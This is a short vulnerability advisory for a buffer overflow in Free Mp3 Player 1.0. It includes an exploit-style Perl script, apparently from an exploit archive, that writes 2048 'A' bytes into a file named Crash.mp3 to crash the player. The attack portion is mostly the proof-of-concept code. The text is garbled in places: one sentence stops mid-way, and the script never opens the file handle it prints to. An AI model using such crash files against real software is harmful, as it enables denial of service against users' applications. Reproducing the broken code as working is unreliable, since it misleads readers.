11:25 AMFree Mp3 Player '.mp3' File Remote Buffer Overflow Vulnerability
Free Mp3 Player is prone to a remote buffer-overflow vulnerability
because it fails to properly bounds-check user-supplied data before
copying it into an insufficiently sized buffer.An attacker can
exploit this issue to execute arbitrary code in the context of the
affected application. Failed exploit attempts will likely result in
Free Mp3 Player 1.0 is vulnerable; other versions may also be affected.
# Exploit Title: Free Mp3 Player 1.0 Local Denial of Service
# Date: 19-12-2011
# Author: JaMbA
# Version: 1.0
# Tested on: Windows 7
my $file= "Crash.mp3";
my $junk= "\x41" x 2048;
print $FILE $junk;
print "\nCrash.mp3 File Created successfully\n";
print "\ Dz-Devloper Work Team (Ahmadso best friend)\n";
Just save this code as [anyname].pl for make it executable in perl.
Solution:- Currently we are not aware of any vendor-supplied patches.